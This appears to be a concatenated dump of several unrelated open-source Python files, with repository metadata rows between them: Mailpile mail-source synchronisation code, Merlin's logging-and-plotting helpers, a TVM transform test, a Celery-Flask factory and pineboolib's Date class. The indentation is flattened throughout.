def _mailbox_name(self, path):
return path.split('/')[-1]
def _create_local_mailbox(self, mbx_cfg, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery
if mbx_cfg.local and mbx_cfg.local != '!CREATE':
if not os.path.exists(mbx_cfg.local):
config.flush_mbox_cache(self.session)
path, wervd = config.create_local_mailstore(self.session,
name=mbx_cfg.local)
wervd.is_local = mbx_cfg._key
mbx_cfg.local = path
if save:
self._save_config()
elif mbx_cfg.local == '!CREATE' or disco_cfg.local_copy:
config.flush_mbox_cache(self.session)
path, wervd = config.create_local_mailstore(self.session)
wervd.is_local = mbx_cfg._key
mbx_cfg.local = path
if save:
self._save_config()
return mbx_cfg
def _create_parent_tag(self, save=True):
disco_cfg = self.my_config.discovery
if disco_cfg.parent_tag:
if disco_cfg.parent_tag == '!CREATE':
name = (self.my_config.name or
(self.my_config.username or '').split('@')[-1] or
(disco_cfg.paths and
os.path.basename(disco_cfg.paths[0])) or
self.my_config._key)
if len(name) < 4:
name = _('Mail: %s') % name
disco_cfg.parent_tag = name
disco_cfg.parent_tag = self._create_tag(disco_cfg.parent_tag,
use_existing=False,
label=False,
icon='icon-mailsource',
unique=False)
if save:
self._save_config()
return disco_cfg.parent_tag
else:
return None
def _create_primary_tag(self, mbx_cfg, save=True):
config = self.session.config
if mbx_cfg.primary_tag and (mbx_cfg.primary_tag in config.tags):
return
# Stayin' alive! Stayin' alive!
disco_cfg = self.my_config.discovery
if not disco_cfg.create_tag:
return
        # Make sure we have a parent tag, as that may be useful when creating
# tag names or the primary tag itself.
parent = self._create_parent_tag(save=False)
# We configure the primary_tag with a name, if it doesn't have
# one already.
if not mbx_cfg.primary_tag:
mbx_cfg.primary_tag = self._create_tag_name(self._path(mbx_cfg))
# If we have a policy for this mailbox, we really go and create
# tags. The gap here allows the user to edit the primary_tag
# proposal before changing the policy from 'unknown'.
if mbx_cfg.policy != 'unknown':
try:
with_icon, as_label = None, True
if mbx_cfg.apply_tags:
# Hmm. Is this too clever? Rationale: if we are always
# applying other tags automatically, then we don't need to
# make the primary tag a label, that's just clutter. Yes?
as_label = False
# Furthermore, when displaying this tag, it makes sense
                    # to use the icon from the other tag we're applying to
                    # these messages. Maybe.
try:
with_icon = config.tags[mbx_cfg.apply_tags[0]].icon
except (KeyError, ValueError):
pass
mbx_cfg.primary_tag = self._create_tag(mbx_cfg.primary_tag,
use_existing=False,
label=as_label,
icon=with_icon,
unique=False,
parent=parent)
except (ValueError, IndexError):
self.session.ui.debug(traceback.format_exc())
if save:
self._save_config()
BORING_FOLDER_RE = re.compile('(?i)^(home|mail|data|user\S*|[^a-z]+)$')
def _path_to_tagname(self, path): # -> tag name
"""This converts a path to a tag name."""
path = path.replace('/.', '/')
parts = ('/' in path) and path.split('/') or path.split('\\')
parts = [p for p in parts if not re.match(self.BORING_FOLDER_RE, p)]
tagname = parts.pop(-1).split('.')[0]
# if self.my_config.name:
# tagname = '%s/%s' % (self.my_config.name, tagname)
return CleanText(tagname.replace('_', ' '),
banned=CleanText.NONALNUM + '{}[]').clean
def _unique_tag_name(self, tagname): # -> unused tag name
"""This makes sure a tagname really is unused"""
tagnameN, count = tagname, 2
while self.session.config.get_tags(tagnameN):
tagnameN = '%s (%s)' % (tagname, count)
count += 1
return tagnameN
def _create_tag_name(self, path): # -> unique tag name
"""Convert a path to a unique tag name."""
return self._unique_tag_name(self._path_to_tagname(path))
def _create_tag(self, tag_name_or_id,
use_existing=True,
unique=False,
label=True,
icon=None,
parent=None): # -> tag ID
if tag_name_or_id in self.session.config.tags:
# Short circuit if this is a tag ID for an existing tag
return tag_name_or_id
else:
tag_name = tag_name_or_id
tags = self.session.config.get_tags(tag_name)
if tags and unique:
raise ValueError('Tag name is not unique!')
elif len(tags) == 1 and use_existing:
tag_id = tags[0]._key
elif len(tags) > 1:
raise ValueError('Tag name matches multiple tags!')
else:
from mailpile.plugins.tags import AddTag, Slugify
bogus_name = 'New-Tag-%s' % len(str(self.session.config))
AddTag(self.session, arg=[bogus_name]).run(save=False)
tags = self.session.config.get_tags(bogus_name)
if tags:
tags[0].slug = Slugify(tag_name, self.session.config.tags)
tags[0].name = tag_name
tags[0].label = label
if icon:
tags[0].icon = icon
if parent:
tags[0].parent = parent
tag_id = tags[0]._key
else:
raise ValueError('Failed to create tag?')
return tag_id
def interrupt_rescan(self, reason):
self._interrupt = reason or _('Aborted')
if self._rescanning:
self.session.config.index.interrupt = reason
def _process_new(self, msg, msg_ts, keywords, snippet):
return ProcessNew(self.session, msg, msg_ts, keywords, snippet)
def _copy_new_messages(self, mbx_key, mbx_cfg,
stop_after=-1, scan_args=None):
session, config = self.session, self.session.config
self.event.data['copying'] = progress = {
'running': True,
'mailbox_id': mbx_key,
'copied_messages': 0,
'copied_bytes': 0,
'complete': False
}
scan_args = scan_args or {}
count = 0
try:
with self._lock:
src = config.open_mailbox(session, mbx_key, prefer_local=False)
loc = config.open_mailbox(session, mbx_key, prefer_local=True)
if src == loc:
return count
# Perform housekeeping on the source_map, to make sure it does
# not grow without bounds or misrepresent things.
gone = []
src_keys = set(src.keys())
loc_keys = set(loc.keys())
for key, val in loc.source_map.iteritems():
if (val not in loc_keys) or (key not in src_keys):
gone.append(key)
for key in gone:
del loc.source_map[key]
# Figure out what actually needs to be downloaded, log it
keys = sorted(src_keys - set(loc.source_map.keys()))
progress.update({
'total': len(src_keys),
'total_local': len(loc_keys),
'uncopied': len(keys),
'batch_size': stop_after if (stop_after > 0) else len(keys)
})
# Go download!
for key in reversed(keys):
if self._check_interrupt(clear=False):
progress['interrupted'] = True
return count
play_nice_with_threads()
session.ui.mark(_('Copying message: %s') % key)
progress['copying_src_id'] = key
data = src.get_bytes(key)
loc_key = loc.add_from_source(key, data)
self.event.data['counters']['copied_messages'] += 1
del progress['copying_src_id']
progress['copied_messages'] += 1
progress['copied_bytes'] += len(data)
progress['uncopied'] -= 1
# This forks off a scan job to index the message
config.index.scan_one_message(
session, mbx_key, loc, loc_key,
wait=False, msg_data=data, **scan_args)
stop_after -= 1
if stop_after == 0:
progress['stopped'] = True
return count
progress['complete'] = True
except IOError:
# These just abort the download/read, which we're going to just
# take in stride for now.
progress['ioerror'] = True
except:
progress['raised'] = True
raise
finally:
progress['running'] = False
return count
def rescan_mailbox(self, mbx_key, mbx_cfg, path, stop_after=None):
session, config = self.session, self.session.config
with self._lock:
if self._rescanning:
return -1
self._rescanning = True
mailboxes = len(self.my_config.mailbox)
try:
ostate, self._state = self._state, 'Rescan(%s, %s)' % (mbx_key,
stop_after)
with self._lock:
apply_tags = mbx_cfg.apply_tags[:]
parent = self._create_parent_tag(save=True)
if parent:
tid = config.get_tag_id(parent)
if tid:
apply_tags.append(tid)
self._create_primary_tag(mbx_cfg)
if mbx_cfg.primary_tag:
tid = config.get_tag_id(mbx_cfg.primary_tag)
if tid:
apply_tags.append(tid)
scan_mailbox_args = {
'process_new': (mbx_cfg.process_new and
self._process_new or False),
'apply_tags': (apply_tags or []),
'stop_after': stop_after,
'event': self.event
}
count = 0
if mbx_cfg.local or self.my_config.discovery.local_copy:
# Note: We copy fewer messages than the batch allows for,
# because we might have been aborted on an earlier run and
# the rescan may need to catch up. We also start with smaller
# batch sizes, because folks are impatient.
self._create_local_mailbox(mbx_cfg)
max_copy = min(self._loop_count * 10,
int(1 + stop_after / (mailboxes + 1)))
self._log_status(_('Copying mail: %s (max=%d)'
) % (path, max_copy))
count += self._copy_new_messages(mbx_key, mbx_cfg,
stop_after=max_copy,
scan_args=scan_mailbox_args)
# Wait for background message scans to complete...
config.scan_worker.do(session, 'Wait', lambda: 1)
play_nice_with_threads()
self._log_status(_('Rescanning: %s') % path)
if 'rescans' in self.event.data:
self.event.data['rescans'][:-mailboxes] = []
return count + config.index.scan_mailbox(session,
mbx_key,
mbx_cfg.local or path,
config.open_mailbox,
**scan_mailbox_args)
except ValueError:
session.ui.debug(traceback.format_exc())
return -1
finally:
self._state = ostate
self._rescanning = False
def open_mailbox(self, mbx_id, fn):
# This allows mail sources to override the default mailbox
# opening mechanism. Returning false respectfully declines.
return None
def is_mailbox(self, fn):
return False
def run(self):
with self.session.config.index_check:
self.alive = True
self._load_state()
self.event.flags = Event.RUNNING
_original_session = self.session
def sleeptime():
if self._last_rescan_completed or self._last_rescan_failed:
return self.my_config.interval
else:
return 1
self._loop_count = 0
while self._loop_count == 0 or self._sleep(self._jitter(sleeptime())):
self._loop_count += 1
if not self.my_config.enabled:
break
self.name = self.my_config.name # In case the config changes
self._update_unknown_state()
if not self.session.config.index:
continue
waiters, self._rescan_waiters = self._rescan_waiters, []
for b, e, s in waiters:
try:
b.release()
except thread.error:
pass
if s:
self.session = s
try:
if 'traceback' in self.event.data:
del self.event.data['traceback']
if self.open():
self.sync_mail()
else:
self._log_conn_errors()
next_save_time = self._last_saved + self.SAVE_STATE_INTERVAL
if self.alive and time.time() >= next_save_time:
self._save_state()
if not self.my_config.keepalive:
self.close()
elif (self._last_rescan_completed and
not self.my_config.keepalive):
self.close()
except:
self.event.data['traceback'] = traceback.format_exc()
self.session.ui.debug(self.event.data['traceback'])
self._log_status(_('Internal error! Sleeping...'))
self._sleep(self.INTERNAL_ERROR_SLEEP)
finally:
for b, e, s in waiters:
try:
e.release()
except thread.error:
pass
self.session = _original_session
self._update_unknown_state()
self._save_state()
# self.event.flags = Event.COMPLETE
self._log_status(_('Shut down'))
def _log_conn_errors(self):
if 'connection' in self.event.data:
cinfo = self.event.data['connection']
if not cinfo.get('live'):
err_msg = cinfo.get('error', [None, None])[1]
if err_msg:
self._log_status(err_msg)
def wake_up(self, after=0):
self._sleeping = after
def rescan_now(self, session=None, started_callback=None):
begin, end = MSrcLock(), MSrcLock()
for l in (begin, end):
l.acquire()
try:
self._rescan_waiters.append((begin, end, session))
self.wake_up()
while not begin.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
if started_callback:
started_callback()
while not end.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
return self._last_rescan_count
except KeyboardInterrupt:
self.interrupt_rescan(_('User aborted'))
raise
finally:
for l in (begin, end):
try:
l.release()
except thread.error:
pass
def quit(self, join=False):
self.interrupt_rescan(_('Shut down'))
self.alive = False
self.wake_up()
if join:
self.join()
def ProcessNew(session, msg, msg_ts, keywords, snippet):
if 'r' in msg.get('status', '').lower():
return False
keywords.update(['%s:in' % tag._key for tag in
session.config.get_tags(type='unread')])
return True
def MailSource(session, my_config):
# FIXME: check the plugin and instantiate the right kind of mail source
# for this config section.
if my_config.protocol in ('mbox',):
from mailpile.mail_source.mbox import MboxMailSource
return MboxMailSource(session, my_config)
elif my_config.protocol in ('maildir',):
from mailpile.mail_source.maildir import MaildirMailSource
return MaildirMailSource(session, my_config)
elif my_config.protocol in ('imap', 'imap_ssl'):
from mailpile.mail_source.imap import ImapMailSource
return ImapMailSource(session, my_config)
elif my_config.protocol in ('pop3', 'pop3_ssl'):
from mailpile.mail_source.pop3 import Pop3MailSource
return Pop3MailSource(session, my_config)
raise ValueError(_('Unknown mail source protocol: %s'
) % my_config.protocol)
| 39.880099 | 79 | 0.521092 |
0fbb13876697fecd10ae9e9f60284cba938814dd | 14,048 | py | Python | src/logplot/logging_plotting.py | shartoo/merlin-tf-slim | 4c7d48d5f634273dd51d2e29562d3ed1195d9151 | ["Apache-2.0"] | null | null | null | src/logplot/logging_plotting.py | shartoo/merlin-tf-slim | 4c7d48d5f634273dd51d2e29562d3ed1195d9151 | ["Apache-2.0"] | null | null | null | src/logplot/logging_plotting.py | shartoo/merlin-tf-slim | 4c7d48d5f634273dd51d2e29562d3ed1195d9151 | ["Apache-2.0"] | null | null | null |
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
# this module provides the base classes that we specialise here
import logging # as logging
import os
import string
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
data = None
# the plot generated from these data
plot = None
def __init__(self, name):
# clear the data series
self.data = {}
def add_data_point(self, series_name, data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name] = []
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
logger = logging.getLogger("plotting")
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l = -1
reference_x = None
# print "starting with self.data=",self.data
for series_name, data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self, **kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData')
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel='', xlim=None, ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name, data_points in self.data.items():
xpoints = numpy.asarray([seq[0] for seq in data_points])
ypoints = numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## plotting multiple images in one figure is not yet supported; the visualization is not good
logger = logging.getLogger("plotting")
logger.error('not supported yet')
self.plot.colorbar(im_data)
self.plot.savefig(filename) # , bbox_inches='tight'
# class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots = {}
# where the plots will be saved - a directory
plot_path = '/tmp' # default location
def __init__(self, name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self, name)
def set_plot_path(self, path):
self.plot_path = path
def remove_all_plots(self):
self.plots = {}
def create_plot(self, plot_name, plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self, plot_name, series_name, data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name, data_point)
def save_plot(self, plot_name, **kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warn('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + plot_name.replace(" ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename, **kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (
30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
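# Illustration (derived from the constants above): for an ERROR record,
# COLOURS['ERROR'] == RED == 1, so the prefix becomes "\033[1;31m", the level
# name is padded to "ERROR   " (8 characters), and RESET_SEQ switches the colour off again.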
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot', MultipleSeriesPlot)
plotlogger.add_plot_point('test plot', 'validation', (1, 4))
plotlogger.add_plot_point('test plot', 'validation', (3, 2))
plotlogger.add_plot_point('test plot', 'validation', (2, 3))
plotlogger.add_plot_point('test plot', 'validation', (4, 3))
plotlogger.add_plot_point('test plot', 'training', (1, 3))
plotlogger.add_plot_point('test plot', 'training', (3, 1))
plotlogger.add_plot_point('test plot', 'training', (2, 2))
plotlogger.add_plot_point('test plot', 'training', (4, 4))
plotlogger.save_plot('test plot', title='Training and validation error', xlabel='epochs', ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| 38.80663 | 141 | 0.648206 |
3fb8331d39fca6a3bddae2b0f547188a36990a53 | 1,803 | py | Python | tests/python/unittest/test_tir_transform_lower_init_block.py | Exhorder6/tvm | 7e3f068373937c0ae08d58f67b84030a027db1c9 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | 90 | 2019-01-26T00:38:49.000Z | 2022-03-11T23:12:34.000Z | tests/python/unittest/test_tir_transform_lower_init_block.py | were/tvm | 7f567264ae1bc1e4bc24a2eeb5b18425997dce22 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | 91 | 2019-02-27T00:17:01.000Z | 2022-02-21T18:08:21.000Z | tests/python/unittest/test_tir_transform_lower_init_block.py | were/tvm | 7f567264ae1bc1e4bc24a2eeb5b18425997dce22 | ["Zlib", "Unlicense", "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0"] | 41 | 2019-01-28T14:37:03.000Z | 2022-03-31T03:58:57.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import tir
from tvm.script import ty
@tvm.script.tir
class WithInit:
def main(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [64, 64, 64])
B = tir.match_buffer(b, [64])
with tir.block([64, tir.reduce_axis(0, 64), tir.reduce_axis(32, 64)]) as [i, j, k]:
with tir.init():
B[i] = tir.float32(0)
B[i] += A[i, j, k]
@tvm.script.tir
class WithBranch:
def main(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [64, 64, 64])
B = tir.match_buffer(b, [64])
with tir.block([64, tir.reduce_axis(0, 64), tir.reduce_axis(32, 64)]) as [i, j, k]:
if (j == 0) and (k == 32):
B[i] = tir.float32(0)
B[i] += A[i, j, k]
def test_lower_reduction():
origin_mod = WithInit()
mod = tvm.tir.transform.LowerInitBlock()(origin_mod)
tvm.ir.assert_structural_equal(mod, WithBranch(), True)
if __name__ == "__main__":
test_lower_reduction()
| 33.388889 | 91 | 0.654465 |
195649c9b52da4f073b5e5a64fa15c287070de25 | 447 | py | Python | bookoutlet_service/tasks.py | tmtaybah/bookoutlet_service | a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb | ["MIT"] | null | null | null | bookoutlet_service/tasks.py | tmtaybah/bookoutlet_service | a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb | ["MIT"] | 6 | 2021-02-08T20:30:37.000Z | 2022-03-11T23:43:41.000Z | bookoutlet_service/tasks.py | tmtaybah/bookoutlet_service | a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb | ["MIT"] | null | null | null |
from celery import Celery
def make_celery(app):
celery = Celery(
app.import_name,
backend=app.config["CELERY_BACKEND"],
broker=app.config["CELERY_BROKER_URL"],
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
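# Usage sketch (illustrative, not part of this module): `app` is assumed to be a
# Flask application whose config defines CELERY_BACKEND and CELERY_BROKER_URL;
# the Redis URLs below are placeholders.
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config.update(CELERY_BROKER_URL="redis://localhost:6379/0",
#                     CELERY_BACKEND="redis://localhost:6379/0")
#   celery = make_celery(app)
#
#   @celery.task()
#   def add(x, y):
#       return x + y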
| 23.526316 | 48 | 0.619687 |
efc15a3a27fea20ff5972fc4df32d3df4114ac88 | 7,582 | py | Python | pineboolib/application/qsatypes/date.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | ["MIT"] | 2 | 2017-12-10T23:06:16.000Z | 2017-12-10T23:06:23.000Z | pineboolib/application/qsatypes/date.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | ["MIT"] | 36 | 2017-11-05T21:13:47.000Z | 2020-08-26T15:56:15.000Z | pineboolib/application/qsatypes/date.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | ["MIT"] | 8 | 2017-11-05T15:56:31.000Z | 2019-04-25T16:32:28.000Z |
"""
Module for Date type.
"""
from typing import Union, Optional, Any
from PyQt6 import QtCore # type: ignore[import]
from pineboolib.application.utils.date_conversion import date_dma_to_amd
class Date(object):
"""
Class that manages a Date-type object.
"""
date_: "QtCore.QDate"
time_: "QtCore.QTime"
def __init__(self, *args: Union["Date", QtCore.QDate, str, QtCore.QTime, int]) -> None:
"""Create new Date object."""
super(Date, self).__init__()
if not args:
self.date_ = QtCore.QDate.currentDate()
self.time_ = QtCore.QTime.currentTime()
elif len(args) <= 2:
date_ = args[0]
format_ = args[1] if len(args) == 2 else "yyyy-MM-dd"
if not isinstance(format_, str):
raise ValueError("format must be string")
self.time_ = QtCore.QTime(0, 0)
if isinstance(date_, str):
if len(date_) == 10:
tmp = date_.split("-")
if len(tmp[2]) == 4:
date_amd = date_dma_to_amd(date_)
if date_amd is None:
raise ValueError("Date %s is invalid" % date_)
date_ = date_amd
self.date_ = QtCore.QDate.fromString(date_, format_)
else:
self.date_ = QtCore.QDate.fromString(date_[0:10], format_)
self.time_ = QtCore.QTime.fromString(date_[11:], "hh:mm:ss")
elif isinstance(date_, Date):
self.date_ = date_.date_
self.time_ = date_.time_
elif isinstance(date_, QtCore.QDate):
self.date_ = date_
elif isinstance(date_, (float, int)):
date_time = QtCore.QDateTime()
date_time.setMSecsSinceEpoch(int(date_))
self.date_ = date_time.date()
self.time_ = date_time.time()
else:
raise ValueError("Unexpected type %s" % type(date_))
if not self.time_:
self.time_ = QtCore.QTime(0, 0)
else:
year, month, day = args[0], args[1], args[2]
if not isinstance(year, int) or not isinstance(month, int) or not isinstance(day, int):
raise ValueError("Expected year, month, day as integers")
self.date_ = QtCore.QDate(year, month, day)
self.time_ = QtCore.QTime(0, 0)
def toString(self, pattern: Optional[str] = None) -> str:
"""
Return string with date & time data.
@return text string with the date and time data
"""
if not pattern:
pattern = "yyyy-MM-ddT%s" % self.time_.toString("hh:mm:ss")
return self.date_.toString(pattern)
def getTime(self) -> int:
"""Get integer representing date & time."""
return int(self.date_.toString("yyyyMMdd%s" % self.time_.toString("hhmmss")))
def getYear(self) -> int:
"""
Return year from date.
@return year
"""
return self.date_.year()
def setYear(self, year: Union[str, int]) -> "Date":
"""
Set year into current date.
@param yyyy. Year to set
"""
self.date_ = QtCore.QDate.fromString(self.date_.toString("%s-MM-dd" % year), "yyyy-MM-dd")
return self
def getMonth(self) -> int:
"""
Get month as a number from current date.
@return month
"""
return self.date_.month()
def setMonth(self, month: Union[str, int]) -> "Date":
"""
Set month into current date.
@param mm. Month to set
"""
month = str(month)
if len(month) < 2:
month = "0%s" % month
self.date_ = QtCore.QDate.fromString(
self.date_.toString("yyyy-%s-dd" % month), "yyyy-MM-dd"
)
return self
def getDay(self) -> int:
"""
Get day from current date.
@return day
"""
return self.date_.day()
def setDay(self, day: Union[str, int]) -> "Date":
"""
Set given day.
@param dd. Day to set
"""
day = str(day)
if len(day) < 2:
day = "0%s" % day
self.date_ = QtCore.QDate.fromString(self.date_.toString("yyyy-MM-%s" % day), "yyyy-MM-dd")
return self
def getHours(self) -> int:
"""
Get Hour from Date.
@return hours
"""
return self.time_.hour()
def getMinutes(self) -> int:
"""
Get Minutes from Date.
@return minutes
"""
return self.time_.minute()
def getSeconds(self) -> int:
"""
Get Seconds from Date.
@return seconds
"""
return self.time_.second()
